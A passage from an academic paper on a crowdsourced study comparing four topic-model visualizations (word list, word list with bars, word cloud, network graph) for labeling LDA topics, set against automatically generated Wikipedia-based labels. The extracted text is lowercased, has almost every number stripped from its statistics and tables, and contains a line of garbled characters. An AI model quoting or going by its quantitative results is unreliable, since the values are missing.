of topics for which automatic labeling works. these findings motivate future automatic labeling algorithms. background presenting the full text of a document corpus is often impractical. for truly large and complex text cor- pora, abstractions, such as topic models, are neces- sary. here we review probabilistic topic modeling and topic model interfaces. . probabilistic topic modeling topic modeling algorithms produce statistical mod- els that discover key themes in documents (blei, ). many specific algorithms exist; in this work we use latent dirichlet allocation (blei et al., , lda) as it is commonly employed. lda is an un- supervised statistical topic modeling algorithm that considers each document to be a “bag of words” and can scale to large corpora (zhai et al., ; hoffman et al., ; smola and narayanamurthy, ). assuming that each document is an admix- ture of topics, inference discovers each topic’s dis- tribution over words and each document’s distribu- tion over topics that best explain the corpus. the set of topics provide a high-level overview of the cor- data available at https://github.com/ alisonmsmith/papers/tree/master/ topicrepresentations. pus, and individual topics can link back to the orig- inal documents to support directed exploration. the topic distributions can also be used to present other documents related to a given document. clustering is hard because there are multiple rea- sonable objectives that are impossible to satisfy si- multaneously (kleinberg, ). topic modeling evaluation has focused on perplexity, which mea- sures how well a model can predict words in un- seen documents (wallach et al., b; jelinek et al., ). however, chang et al. ( ) argue that eval- uations optimizing for perplexity encourage com- plexity at the cost of human interpretability. new- man et al. ( a) build on this insight, noting that “one indicator of usefulness is the ease by which one could think of a short label to describe the topic.” unlike previous interpretability studies, here we ex- amine the connection between a topic’s visual repre- sentation (not just its content) and its interpretabil- ity. recent work has focused on automatic generation of labels for topics. lau et al. ( ) use wikipedia articles to automatically label topics. the assump- tion is that for each topic there will be a wikipedia article title that offers a good representation of the topic. aletras et al. ( ) use a graph-based ap- proach to better rank candidate labels. they gen- erate a graph from the words in candidate articles and use pagerank to find a representative label. in section we use an adapted version of the method presented by lau et. al. ( ) as a representative automatic labeling algorithm. . topic model visualizations the topic visualization techniques in our study— word list, word list with bars, word cloud, and net- work graph—commonly appear in topic modeling tools. here, we provide an overview of tools that display an entire topic model or models to the user, while more detail on the individual topic visualiza- tion techniques can be found in section . . topical guide (gardner et al., ), topic viz (eisenstein et al., ), and the topic model visualization engine (chaney and blei, ) are tools that support corpus understanding and directed browsing through topic models. they display the model overview as an aggregate of underlying topic visualizations. for example, topical guide uses hor- https://github.com/alisonmsmith/papers/tree/master/topicrepresentations https://github.com/alisonmsmith/papers/tree/master/topicrepresentations https://github.com/alisonmsmith/papers/tree/master/topicrepresentations figure : examples of the twelve experimental conditions, each a different visualization of the same topic about the george w. bush presidential administration and the iraq war. rows represent cardinality, or number of topic words shown (five, ten, twenty). columns represent visualization techniques. for word list and word list with bars, topic words are ordered by their probability for the topic. word list with bars also includes horizontal bars to represent topic-term probabilities. in the word cloud, words are randomly placed but are sized according to topic-term probabilities. the network graph uses a force-directed layout algorithm to co-locate words that frequently appear together in the corpus. izontal word lists when displaying an overview of an entire topic model but uses a word cloud of the top words for a topic when displaying only a single topic. topic viz and the topic model visu- alization engine both represent topics with vertical word lists; the latter also uses set notation. other tools provide additional information within topic model overviews, such as the relationship be- tween topics or temporal changes in the model. however, they still require the user to understand individual topics. ldavis (sievert and shirley, ) includes information about the relationship between topics in the model. multi-dimensional scaling projects the model’s topics as circles onto a two-dimensional plane based on their inter-topic distances; the circles are sized by their overall preva- lence. the individual topics, however, are then vi- sualized on demand using a word list with bars. smith et al. ( ) visualize a topic model using a nested network graph layout called group-in-a- box (rodrigues et al., , gib). the individual topics are displayed using a network graph visu- alization, and related topics are displayed within a treemap (shneiderman, ) layout. the result is a visualization where related words cluster within top- ics and related topics cluster in the overall layout. topicflow (smith et al., ) visualizes how a model changes over time using a sankey dia- gram (riehmann et al., ). the individual top- ics are represented both as word lists in the model overview and as word list with bars when view- ing a single topic or comparing between two top- ics. argviz (nguyen et al., ) captures tempo- ral shifts in topics during a debate or a conversation. the individual topics are presented as word lists in the model overview and using word list with bars for the selected topics. klein et al. ( ) use a dust- and-magnet visualization (yi et al., ) to visu- alize the force of topics on newspaper issues. the temporal trajectories of several newspapers are dis- played as dust trails in the visualization. the indi- vidual topics are displayed as word clouds. in contrast to these visualizations which sup- port viewing the underlying topics on demand, ter- mite (chuang et al., ) uses a tabular layout of words and topics to provide an overview of the model to compare across topics. it organizes the model into clusters of related topics based on word overlap. this clustered representation is both space- efficient and speeds corpus understanding. despite the breadth of topic model visualizations, a small set of individual topic representations are ubiquitous: word list, word list with bars, word cloud, and network graph. in the following sections, we compare these topic visualization techniques. method: comparing visualizations we conduct a controlled online study to compare the four commonly used visualization techniques identi- fied in section : word list, word list with bars, word cloud, and network graph. we also compare effec- tiveness with the number of topic words shown, that is, the cardinality of the visualization: five, ten or twenty topic words. . dataset we select a corpus that does not assume domain ex- pertise: , new york times articles from january (sandhaus, ). we model the corpus using an lda (blei et al., ) implementation in mal- let (yao et al., ) with domain-specific stopwords and standard hyperparameter settings. our simple setup is by design: our goal is to emulate the “off the shelf” behavior of conventional topic modeling tools used by novice users. instead of improving the quality of the model using asymmetric priors (wal- lach et al., a) or bigrams (boyd-graber et al., ), our topic model has topics of variable qual- ity, allowing us to explore the relationship between topic quality and our task measures. automatic labels are generated from representa- tive wikipedia article titles using a technique sim- ilar to lau et al. ( ). we first index wikipedia using apache lucene. to label a topic, we query wikipedia with the top twenty topic words to re- trieve fifty articles. these articles’ titles comprise our candidate set of labels. we then represent each n= , α = . , β = . http://lucene.apache.org/ article using its tf-idf vector and calculate the cen- troid (average tf-idf) of the retrieved articles. to rank and choose the most representative of the set, we calculate the cosine similarity between the cen- troid tf-idf vector and the tf-idf vector of each of the articles. we choose the title of the article with the maximum cosine similarity to the centroid. un- like lau et al. ( ), we do not include the topic words or wikipedia title n-grams derived from our label set, as these labels are typically not the best candidates. although other automatic labeling tech- niques exist, we choose this one as it is representa- tive of general techniques. . visualizations as discussed in section , our study compares four of the most common topic visualization tech- niques. to produce a meaningful comparison, the space given to each visualization is held constant: × pixels. figure shows each visualiza- tion for the three cardinalities (or number of words displayed) for the same topic. word list the most straightforward topic repre- sentation is a list of the top n words in the topic, ranked by their probability. in practice, topic word lists have many variations. they can be represented horizontally (gardner et al., ; smith et al., ) or vertically (eisenstein et al., ; chaney and blei, ), with or without commas separating the individual words, or using set notation (chaney and blei, ). nguyen et al. ( ) add the weights to the word list by sizing the words based on their probability for the topic, which blurs the boundary with word clouds; however, this approach is not common. we use a horizontal list of equally sized words ordered by the probability p(w|z) for the word w in the topic z. for space efficiency, we organize our word list in two columns and add item numbers to make the ordering explicit. word list with bars combining bar graphs with word lists yields a visual representation that not only conveys the ordering but also the absolute value of the weights associated with the words. we use a similar implementation to smith et al. ( ) to add horizontal bars to the word list for a topic z where the length of each bar represents the probability p(w|z) for each word w. http://lucene.apache.org/ figure : the labeling task for the network graph and ten words. users create a short label and full sentence describing the topic and rate their confidence that the label and sentence represent the topic well. word cloud the word cloud (or tag cloud) is one of the most popular and well-known text visualiza- tion techniques and is a common visualization for topics. many options exist for word cloud layout, color scheme, and font size (mueller, ). ex- isting work on layouts is split between those that size words by their frequency or probability for the topic (ramage et al., ) and those that size by the rank order of the word (barth et al., ). we use a combination of these techniques where the word’s font size is initially set proportional to its probabil- ity in a topic p(w|z). however, when the word is too large to fit in the canvas, the size is gradually decreased (barth et al., ). we use a gray scale to visually distinguish words and display all words horizontally to improve readability. network graph our most complex topic visual- ization is a network graph. we use a similar network graph implementation to smith et al. ( ), which represents each topic as a node-link diagram, where words are circular nodes with edges drawn between commonly co-occurring words. each word’s radius is scaled by the probability p(w|z) for the word w in a topic z. while smith et al. ( ) draw edges based on document-level co-occurrence, we instead use edges to pull together phrases, so they are drawn between words w and w based on bigram count, specifically if log(count(w ,w )) > k, with k = . . edge width and color are applied uniformly to fur- ther reduce complexity in the graph. the network graph is displayed using a force-directed graph lay- out algorithm (fruchterman and reingold, ) where all nodes repel each other but links attract connected nodes. . cardinality although every word has some probability for every topic, p(w|z), visualizations typically display only the top n words. the cardinality may interact with the effectiveness of the different visualization tech- niques (e.g., more complicated visualizations may degrade with more words). we use n ∈{ , , }. . task and procedure the study includes two phases with different users. in labeling (phase i), users describe a topic given a specific visualization, and we measure speed and self-reported confidence in completing the task. in validation (phase ii), users select the best and worst among a set of phase i descriptions and an automat- ically generated description for how well they repre- sent the original topics’ documents. phase i: labeling for each labeling task, users see a topic visualization, provide a short label (up from k ∈{ . , . , . , . }, we chose k = . as the best trade-off between complexity and provided information. figure : the validation task shows the titles of the top ten documents and five potential labels for a topic. users are asked to pick the best and worst labels. four labels were created by phase i users after viewing different visualizations of the topic, while the fifth was generated by the algorithm. the labels are shown in random order. to three words), then give a longer sentence to de- scribe the topic, and finally use a five-point likert scale to rate their confidence that the label and sen- tence represent the topic well. we also track the time to perform the task. figure shows an example of a labeling task using the network graph visualization technique with ten words. labeling tasks are randomly grouped into human intelligence tasks (hit) on mechanical turk such that each hit includes five tasks from the same vi- sualization technique. phase ii: validation in the validation phase, a new set of users assesses the quality of the labels and sentences created in phase i by evaluating them against documents associated with the given topic. it is important to evaluate the topic labels in con- text; a label that superficially looks good is useless if it is not representative of the underlying documents all users are in the us or canada, have more than fifty previously approved hits, and have an approval rating greater than %. we did not restrict users from performing multiple hits, which may have exposed them to multiple visualization tech- niques. users completed on average . hits. in the corpus. algorithmically generated labels (not sentences) are also included. figure shows an ex- ample of the validation task. the user-generated labels and sentences are eval- uated separately. for each task, the user sees the titles of the top ten documents associated with a topic and a randomized set of labels or sentences, one elicited from each of the four visualization tech- niques within a given cardinality. the set of labels also includes an algorithmically generated label. we ask the user to select the “best” and “worst” of the labels or sentences based on how well they describe the documents. documents are associated to topics based on the probability of the topic, z, given the document, d, p(z|d). only the title of each docu- ment is initially shown to the user with an option to “show article” (or view the first characters of the document). all labels are lowercased to enforce uniformity. we merge identical labels so users do not see dupli- cates. if a merged label receives a “best” or “worst” vote, the vote is split equally across all of the origi- nal instances (i.e., across multiple visualization tech- niques with that label). finally, we track task com- pletion time. each user completes four randomly selected vali- dation tasks as part of a hit, with the constraint that each task must be from a different topic. we also use ground truth seeding for quality control: each hit includes one additional test task that has a pur- posefully bad label generated by concatenating three random dictionary words. if the user does not pick the bad label as the “worst”, we discard all data in that hit. . study design and data collection for phase i, we use a factorial design with factors of visualization (levels: word list, word list with bars, word cloud, and network graph) and cardinal- ity (levels: , , and ), yielding twelve condi- tions. for each of the fifty topics in the model and each of the twelve conditions, at least five users per- form the labeling task, describing the topic with a label and sentence, resulting in a minimum of , label and sentence pairs. each hit includes five of these labeling tasks, for a minimum of hits. the users are paid $ . per hit. for phase ii, we compare descriptions across the four visualization techniques (and automatically generated labels), but only within a given cardinality level rather than across cardinalities. we collected , label and sentence pairs from users during phase i. for validation in phase ii, we use the first five labels and sentences collected for each condi- tion for a total of . labels and sentences. these are shown in sets of four (labels or sentences) dur- ing phase ii, yielding a total of , ( , / + , / ) tasks. each hit contains four validation tasks and one ground truth seeding task, for a to- tal of hits. to increase robustness, we validate twice for a total of hits, without allowing any two labels or sentences to be compared twice. the users get $ . per hit. results we analyze labeling time and self-reported confi- dence for the labeling task (phase i) before report- ing on the label quality assessments (phase ii). we then analyze linguistic qualities of the labels, which should motivate future work in automatic label gen- eration. (a) topic (coh. = . )(b) topic ( . ) (c) topic ( . ) (d) topic ( . ) (e) topic ( . ) (f) topic ( . ) to pi cs w / h ig h c oh er en ce to pi cs w / l ow c oh er en ce figure : word list with bar visualizations of the three best (top) and worst (bottom) topics according to their coherence score, which is shown to the right of the topic number. the average topic coherence is . (sd= . ). we first provide an example of user-generated la- bels and sentences: the user labels for the topic shown in figure include government, iraq war, politics, bush administration, and war on terror. ex- amples of sentences include “president bush’s mili- tary plan in iraq” and “world news involving the us president and iraq”. to interpret the results, it is useful to also un- derstand the quality of the generated topics, which varies throughout the model and may impact a user’s ability to generate good labels. we measure topic quality using topic coherence, an automatic measure that correlates with how much sense a topic makes to a user (lau et al., ). the average topic coher- ence for the model is . (sd = . ). figure shows the three best (top) and three worst topics (bottom) according to their observed coherence: the coherence metric distinguishes obvious topics from inscrutable ones. section . shows that users cre- the complete set of labels and sentences are available at https://github.com/alisonmsmith/papers/ tree/master/topicrepresentations. we use a reference corpus of million wikipedia arti- cles for computing normalized pointwise mutual information needed for computing the observed coherence. https://github.com/alisonmsmith/papers/tree/master/topicrepresentations https://github.com/alisonmsmith/papers/tree/master/topicrepresentations technique word list word list w/ bars word cloud network graph cardinality # tasks completed avg time (sd) . ( . ) . ( . ) . ( . ) . ( . ) . ( . ) . ( . ) . ( . ) . ( . ) . ( . ) . ( . ) . ( . ) . ( . ) avg confidence (sd) . ( . ) . ( . ) . ( . ) . ( . ) . ( . ) . ( . ) . ( . ) . ( . ) . ( . ) . ( . ) . ( . ) . ( . ) table : overview of the labeling phase: number of tasks completed, the average and standard deviation (in paren- theses) for time spent per task in seconds, and the average and standard deviation for self-reported confidence on a -point likert scale for each of the twelve conditions. 吀椀洀攀 ⠀猀攀挀⸀⤀ 眀漀爀搀猀㔀 ㄀  ㈀  㔀 ㄀  ㈀  㔀 ㄀  ㈀  㔀 ㄀  ㈀  圀漀爀搀 䰀椀猀琀 圀漀爀搀 䰀椀猀琀 眀⼀ 䈀愀爀猀 圀漀爀搀 䌀氀漀甀搀 一攀琀眀漀爀欀 䜀爀愀瀀栀 㔀  㐀  㘀  㜀  㠀  figure : average time for the labeling task, across vi- sualizations and cardinalities, ordered from left to right by visual complexity. for words, network graph was significantly slower and word list was significantly faster than the other visualization techniques. error bars show standard error. ated lower quality labels for low coherence topics. . labeling time more complex visualization techniques take longer to label (table and figure ). the labeling tasks took on average . seconds (sd = . ) to com- plete and a two-way anova (visualization technique × cardinality) reveals significant main effects for both the visualization technique and the cardinal- ity, as well as a significant interaction effect. for lower cardinality, the labeling time across vi- sualization techniques is similar, but there are no- table differences for higher cardinality. posthoc pairwise comparisons based on the interaction ef- fect (with bonferroni adjustment) found no signif- icant differences between visualizations with five words and only one significant difference for ten words (word list with bars was slower than word cloud, p < . ). for twenty words, however, the net- work graph was significantly slower at an average of . s (sd = . ) than the other three visualiza- f( , ) = . , p < . , η p = . f( , ) = . , p < . , η p = . f( , ) = . , p < . , η p = . tions ( p < . ). this effect is likely due to the net- work graph becoming increasingly dense with more nodes (figure , bottom right). in contrast, the rel- atively simple word list visualization was signifi- cantly faster with twenty words than the three other visualizations (p < . ), taking only . s on aver- age (sd = . ). word list with bars and word cloud were not significantly different from each other. as a secondary analysis, we examine the rela- tionship between elapsed time and the observed co- herence for each topic. topics with high coher- ence scores, for example, may be faster to label, because they are easier to interpret. however, the small negative correlation between time and coher- ence (figure , top) was not significant (r =−. , p = . ). . self-reported labeling confidence for each labeling task, users rate their confidence that their labels and sentences describe the topic well on a scale from (least confident) to (most confi- dent). the average confidence across all conditions was . (sd = . ). kruskal-wallis tests show a sig- nificant impact of visualization technique on con- fidence with five and ten words, but not twenty. while average confidence ratings across all condi- tions only range from . to . , perceived confi- dence with network graph suffers when the visual- ization has too few words (table ). as a secondary analysis, we compare the self- reported confidence with observed coherence for each topic (figure , bottom). increased user con- fidence with more coherent topics is supported by a moderate positive correlation between topic coher- five words: χ = . , p = . . ten words: χ = . , p = . . we used nonparametric tests because the data is ordi- nal and we cannot guarantee that all differences between points on the scale are equal. figure : relationship between observed coherence and labeling time (top) and observed coherence and self- reported confidence (bottom) for each topic. the positive correlation (slope = . and r = . ) for confidence is significant. ence and confidence (r = . , p = . ). this re- sult provides further evidence that topic coherence is an effective measurement of topic interpretability. . other users’ rating of label quality other users’ perceived quality of topic labels is the best real-world measure of quality (as described in section . ). overall, the visualization techniques had similar quality labels, but automatically gener- ated labels do not fare well. automatic labels get far fewer “best” votes and far more “worst” votes than user-generated labels produced from any of the four visualization techniques (figure ). chi-square tests on the distribution of “best” votes for labels for each cardinality show that the visualization mat- ters. posthoc analysis using pairwise chi-square five words: χ ,n= = . , p = . . ten words: χ ,n= = . , p = . . twenty words: χ ,n= = . , p < . . tests with bonferroni correction show that automatic labels were significantly worse than user-generated labels from each of the visualization techniques (all comparisons p < . ). no other pairwise compar- isons were significant. for sentences, no visualization technique emerged as better than the others. additionally, there is no existing automatic approach to compare against. the distribution of “best” counts here was relatively uniform. separate kruskal-wallis tests for each cardinality to examine the impact of the visualization techniques on “best” counts did not reveal any significant results. as a secondary qualitative analysis, we examine the relationship between topic coherence and the as- sessed quality of the labels. the automatic algorithm tended to produce better labels for the coherent top- ics than for the incoherent topics. for example, topic (figure , b)—{music, band, songs}—and topic (figure , c)—{food, restaurant, wine}— are two of the most coherent topics. the automatic algorithm labeled topic as music and topic as food. for both of these coherent topics, the labels generated by the automatic algorithm secured the most “best” votes and no “worst” votes. in contrast, topic (figure , e)—{years, home, work}—and topic (figure , f)—{death, family, board}— are two of the least coherent topics. the automatic labels refusal of work and death of michael jackson yielded the most “worst” votes and fewest “best” votes. to further demonstrate this relationship, we ex- tracted from the topics the top and bottom quar- tiles of topics each based on their observed co- herence scores. figure shows a comparison of the “best” and “worst” votes for the topic labels for these quartiles, including user-generated and auto- matically generated labels. for the top quartile, the number of “best” votes per technique ranged from for automatic labels to for the network graph visualization. the range for the bottom quartile was larger, from only “best” votes for automatic la- bels to for word list with bars. the automatic la- bels, in particular, received a large relative increase in “best” votes when comparing the bottom quartile we could not get exact quartiles, because we have top- ics, so we rounded up to include topics in each quartile. # of “b es t” / “w or st ” v ot es words words words words words words (a) labels per condition (b) sentences per condition “best” votes “worst” votes figure : the “best” and “worst” votes for labels and sentences for each condition. the automatically generated labels received more “worst” votes and fewer “best” votes compared to the user-created labels. to the top quartile (increase of %). additionally, the word list, word cloud, and net- work graph visualizations all lead to labels with sim- ilar “best” and “worst” votes for both the top and bottom quartiles. however, the word list with bars representation shows both a large relative increase for the best votes (increase of %) and relative de- crease for the “worst” votes (decrease of %) when comparing the top to the bottom quartile. these re- sults suggest that adding numeric word probability information highlighted by the bars may help users understand poor quality topics. . label analysis the results of phase i provide a large manually gen- erated label set. exploratory analysis of these labels reveals linguistic features users tend to incorporate when labeling topics. we discuss implications for automatic labeling in section . in particular, users prefer shorter labels, labels that include topic words and phrases, and abstraction in topic labeling. length the manually generated labels use . words (sd = . ), and the algorithmically gener- ated labels use . words (sd = . ). interest- ingly, the labels voted as “best” were shorter on aver- age than those voted “worst”, regardless of whether algorithmically generated labels are included in the analysis. with algorithmically generated labels in- network graph algorithmword cloudword list w/ barsword list network graph algorithmword cloudword list w/ barsword list (a) top quartile of topics (b) bottom quartile of topics # of “ b es t” / “w or st ” vo te s fo r la be ls figure : comparison of the “best” and “worst” votes for labels generated using the different visualization tech- niques (and the automatically generated labels) for the top quartile of topics (top) and bottom quartile of topics (bottom) by topic coherence. the automatically gener- ated labels receive far more “best” votes for the coherent topics. cluded, the average lengths are . (sd = . ) words for “best” labels and . (sd = . ) words for “worst” labels, but even without the algo- rithmically generated labels, the “best” labels are the “best” label set includes all labels voted at least once as “best”, and similarly the “worst” label set includes all labels voted at least once as “worst”. figure : relationship between rank of topic words and the average probability of occurrences in labels. the three lines—red, green, and blue—represent cardinality of five, ten, and twenty, respectively. the higher-ranked words were used more frequently. shorter (m = . , sd = . ) than the “worst” la- bels (m = . , sd = . ). shared topic words of the , labels, , , or %, contain at least one word taken directly from the topic words—that is, the five, ten, or twenty words shown in the visualization; however, there are no notable differences between the visualization techniques. additionally, the number of topic words included on average was similar across all three car- dinalities, suggesting that users often use the same number of topic words regardless of how many were shown in the visualization. we further examine the relationship between a topic word’s rank and whether the word was selected for inclusion in the labels. figure shows the aver- age probability of a topic word being used in a label by the topic word’s rank. more highly ranked words were included more frequently in labels. as cardi- nality increased, the highest ranked words were also less likely to be employed, as users had more words available to them. phrases although lda makes a “bag of words” assumption when generating topics, users can recon- struct relevant phrases from the unique words. for topic , for example, all visualizations include the same topic terms. however, the network graph vi- sualization highlights the phrases “jazz singer” and “rock band” by linking their words as commonly co- occurring terms in the corpus. these phrases are not as easily discernible in the word cloud visual- ization (figure ). we compute a set of common figure : word cloud and network graph visualizations of topic . phrases such as “jazz singer” and “rock band” are obscured in the word cloud but are shown in the network graph as connected nodes. phrases by taking all bigrams and trigrams that oc- cur more than fifty and twenty times, respectively, in the nyt corpus. of the labels, contain one of these common phrases, but those generated by users with the network graph visualization contain the most phrases. labels generated in the word list ( % of the labels), word list with bars ( %), and word cloud ( %) conditions contain fewer phrases than the labels generated in the network graph condi- tion ( %). although it is not surprising that the net- work graph visualization better communicates com- mon phrases in the corpus as edges are drawn be- tween these phrases, this suggests other approaches to drawing edges. edges drawn based on sentence or document-based co-occurrence, for example, could instead uncover longer-distance dependencies be- tween words, potentially identifying distinct sub- topics with a topic. hyponymy users often prefer more general terms for labels than the words in the topic (newman et al., b). to measure this, we look for the set of unique hyponyms and hypernyms of the topic words, or those that are not themselves a topic word, that appear in the manually generated labels. we use the super-subordinate relation, which represents hypernymy and hyponymy, from wordnet (miller, ). of the , labels, include a unique hypernym and include a unique hyponym of the associated topic words found using wordnet, confirming that users are significantly more likely to produce a more generic description of the topic (χ ,n= = . , p < . ). for the more generic labels, fewer of these came from word list ( %) and more from the network graph ( %) than the other visualization techniques—word list with bars ( %) and word cloud ( %). this may mean that the network graph helps users to better under- stand the topic words as a group and therefore la- bel them using a hypernym. we also compared hy- pernym inclusion for “best” and “worst” labels: ( %) of the “best” labels included a hypernym while only ( %) of the “worst” labels included a hy- pernym. each of the visualization techniques led to approximately the same percentage of the total more specific labels. discussion although the four visualization techniques yield similar quality labels, our crowdsourced study high- lights the strengths and weaknesses of the tech- niques. it also reveals some preferred linguistic fea- tures of user-generated labels and how these differ from automatically generated labels. the trade-offs among the visualization tech- niques show that context matters. if efficiency is paramount, then word lists—both simple and fast— are likely best. for a cardinality of twenty words, for example, users presented with the simple word list are significantly faster at labeling than those shown the network graph visualization. at the same time, more complex visualizations expose users to multi-word expressions that the simpler visualiza- tion techniques may obscure (section . ). future work should investigate for what types of user tasks this information is most useful. there is also po- tential for misinterpretation of topic meaning when cardinality is low. users can misunderstand the topic based on the small set of words, or adjacent words can inadvertently appear to form a meaning- ful phrase, which may be particularly an issue for the word cloud. our crowdsourced study identified the “best” and “worst” labels for the topic’s documents. an addi- tional qualitative coding phase could evaluate each “worst” label to determine why, whether due to misinterpretation, spelling or grammatical errors, length, or something else. surprisingly, we found no relationship between topic coherence and labeling time (section . ). this is perhaps because not only are users quick to label topics they understand, but they also quickly give up when they have no idea what a topic is about. we do, however, find a relationship between coher- ence and confidence (section . ). this positive correlation supports topic coherence as an effective measure for human interpretability. automatically generated labels are consistently chosen as the “worst” labels, although they are com- petitive with the user-generated labels for highly coherent topics (section . ). future automatic labeling algorithms should still be robust to poor topics. algorithmically generated labels were longer and more specific than the user-generated la- bels. it is unsurprising that these automatic labels were consistently deemed the worst. users pre- fer shorter labels with more general words (e.g., hypernyms, section . ). we show specific ex- amples of this phenomenon from topic and topic . for topic —{health, drug, med- ical, research, conditions}—the algorithm gener- ated the label health care in the united states, but users preferred the less specific labels health and medical research. similarly, for topic —{league, team, baseball, players, contract}—the algorithm generated the label major league baseball on fox; users preferred simpler labels, such as baseball. au- tomatic labeling algorithms thus can be improved to focus on general, shorter labels. interestingly, sim- ple textual labels have been shown to be more ef- ficient but less effective than topic keywords (i.e., word lists) for an automatic document retrieval task (aletras and stevenson, ), highlighting the extra information present in the word lists. our find- ings show that users are also able to effectively in- terpret the word list information, as that visualiza- tion was both efficient and effective for the task of topic labeling compared to the other more complex visualizations. although we use wordnet to verify that users pre- fer more general labels, this is not a panacea, be- cause wordnet does not capture all of the general- ization users want in labels. in many cases, users use terms that synthesize relationships beyond triv- ial wordnet relationships, such as locations or en- tities. for example, topic —{san, los, angeles, terms, francisco}—was consistently labeled as the location california, and topic —{open, second, final, won, williams}—which almost all users la- beled as tennis, required a knowledge of the enti- ties serena williams and the u.s. open. in addition to wordnet, an automatic labeling algorithm could use a gazetteer for determining locations from topic words and a knowledge base such as tap (guha and mccool, ), which provides a broad range of in- formation about popular culture for matching topic words to entities. conclusion and future work we present a crowdsourced user study to com- pare four topic visualization techniques—a simple ranked word list, a ranked word list with bars rep- resenting word probability, a word cloud, and a net- work graph—based on how they impact the user’s understanding of a topic. the four visualization techniques lead to similar quality labels as rated by end users. however, users label more quickly with the simple word list, yet tend to incorporate phrases and more generic terminology when using the more complex network graph. additionally, users feel more confident labeling coherent topics, and manual labels far outperform the automatically generated la- bels against which they were evaluated. automatic labeling can benefit from this research in two ways: by suggesting when to apply automatic labeling and by providing training data for improv- ing automatic labeling. while automatic labels falter compared to human labels in general, they do quite well when the underlying topics are of high qual- ity. thus, one reasonable strategy would be to use automatic labels for a portion of topics, but to use human validation to either first improve the remain- der of the topics (hu et al., ) or to provide labels (as in this study) for lower quality topics. moreover, our labels provide training data that may be use- ful for automatic labeling techniques using feature- based models (charniak, )—combining infor- mation from wikipedia, wordnet, syntax, and the underlying topics—to reproduce the types of labels and sentences created (and favored) by users. finally, our study focuses on comparing individ- ual topic visualization techniques. an open ques- tion that we do not address is whether this gen- eralizes to understanding entire topic models. in other words, simple word list visualizations are use- ful for quick and high-quality topic summarization, but does this mean that a collection of word lists— one per topic—will also be optimal when displaying the entire model? future work should look at com- paring visualization techniques for full topic model understanding. acknowledgments we would like to thank the anonymous reviewers as well as the tacl editors, timothy baldwin and lil- lian lee, for helpful comments on an earlier draft of this paper. this work was funded by nsf grant iis- . any opinions, findings, and conclusions or recommendations expressed in this material are those of the authors and do not necessarily reflect the views of the national science foundation. references nikolaos aletras and mark stevenson. . labelling topics using unsupervised graph-based methods. in proceedings of the association for computational lin- guistics. nikolaos aletras, timothy baldwin, jey han lau, and mark stevenson. . representing topics labels for exploring digital libraries. in proceedings of the ieee/acm joint conference on digital libraries. lukas barth, stephen g. kobourov, and sergey pupyrev. . experimental comparison of semantic word clouds. in experimental algorithms. springer. david m. blei, andrew y. ng, and michael i. jordan. . latent dirichlet allocation. journal of machine learning research, : – . david m. blei. . probabilistic topic models. com- munications of the acm, ( ): – . jordan boyd-graber, david mimno, and david newman, . care and feeding of topic models: problems, diagnostics, and improvements. crc handbooks of modern statistical methods. crc press, boca raton, florida. allison june barlow chaney and david m. blei. . visualizing topic models. in international conference on weblogs and social media. jonathan chang, jordan boyd-graber, chong wang, sean gerrish, and david m. blei. . reading tea leaves: how humans interpret topic models. in pro- ceedings of advances in neural information process- ing systems. eugene charniak. . a maximum-entropy-inspired parser. in conference of the north american chapter of the association for computational linguistics. jason chuang, christopher d. manning, and jeffrey heer. . termite: visualization techniques for as- sessing textual topic models. in proceedings of the acm conference on advanced visual interfaces. jacob eisenstein, duen horng chau, aniket kittur, and eric xing. . topicviz: interactive topic explo- ration in document collections. in international con- ference on human factors in computing systems. thomas m.j. fruchterman and edward m. reingold. . graph drawing by force-directed placement. software: practice and experience, ( ): – . matthew j. gardner, joshua lutes, jeff lund, josh hansen, dan walker, eric ringger, and kevin seppi. . the topic browser: an interactive tool for browsing topic models. in proceedings of the nips workshop on challenges of data visualization. ramanathan guha and rob mccool. . tap: a semantic web platform. computer networks, ( ): – . matthew hoffman, david m. blei, chong wang, and john paisley. . stochastic variational inference. journal of machine learning research, : – . andreas hotho, andreas nürnberger, and gerhard paass. . a brief survey of text mining. journal for computational linguistics and language technology, ( ): – . yuening hu, jordan boyd-graber, brianna satinoff, and alison smith. . interactive topic modeling. ma- chine learning, ( ): – . fred jelinek, robert l. mercer, lalit r. bahl, and james k. baker. . perplexity–a measure of the difficulty of speech recognition tasks. the journal of the acoustical society of america, (s ):s –s . lauren f. klein, jacob eisenstein, and iris sun. . exploratory thematic analysis for digitized archival collections. digital scholarship in the humanities. jon kleinberg. . an impossibility theorem for clus- tering. in proceedings of advances in neural infor- mation processing systems. jey han lau, david newman, sarvnaz karimi, and tim- othy baldwin. . best topic word selection for topic labelling. in proceedings of the association for computational linguistics. jey han lau, karl grieser, david newman, and timothy baldwin. . automatic labelling of topic models. in proceedings of the association for computational linguistics. jey han lau, david newman, and timothy baldwin. . machine reading tea leaves: automatically evaluating topic coherence and topic model quality. in proceedings of the european chapter of the associa- tion for computational linguistics. qiaozhu mei, xuehua shen, and chengxiang zhai. . automatic labeling of multinomial topic mod- els. in knowledge discovery and data mining. george a. miller. . wordnet: a lexical database for english. communications of the acm, ( ): – . andrew mueller. . word cloud. https:// github.com/amueller/word_cloud. david newman, jey han lau, karl grieser, and timothy baldwin. a. automatic evaluation of topic coher- ence. in conference of the north american chapter of the association for computational linguistics. david newman, youn noh, edmund talley, sarvnaz karimi, and timothy baldwin. b. evaluating topic models for digital libraries. in proceedings of the ieee/acm joint conference on digital libraries. viet-an nguyen, yuening hu, jordan boyd-graber, and philip resnik. . argviz: interactive visualiza- tion of topic dynamics in multi-party conversations. in conference of the north american chapter of the as- sociation for computational linguistics. daniel ramage, susan t. dumais, and daniel j. liebling. . characterizing microblogs with topic models. in international conference on weblogs and social media. patrick riehmann, manfred hanfler, and bernd froehlich. . interactive sankey diagrams. in ieee symposium on information visualization. eduarda mendes rodrigues, natasa milic-frayling, marc smith, ben shneiderman, and derek hansen. . group-in-a-box layout for multi-faceted anal- ysis of communities. in proceedings of the ieee con- ference on social computing. evan sandhaus. . the new york times annotated corpus ldc t . linguistic data consortium, philadelphia. ben shneiderman. . tree visualization with treemaps: a -d space-filling approach. acm trans- actions on graphics, ( ): – . carson sievert and kenneth e. shirley. . ldavis: a method for visualizing and interpreting topics. in proceedings of the workshop on interactive language learning, visualization, and interfaces. alison smith, jason chuang, yuening hu, jordan boyd- graber, and leah findlater. . concurrent visu- alization of relationships between words and topics in topic models. in proceedings of the workshop on in- teractive language learning, visualization, and inter- faces. alison smith, sana malik, and ben shneiderman. . visual analysis of topical evolution in unstructured text: design and evaluation of topicflow. in appli- cations of social media and social network analysis. alexander smola and shravan narayanamurthy. . an architecture for parallel topic models. in proceed- 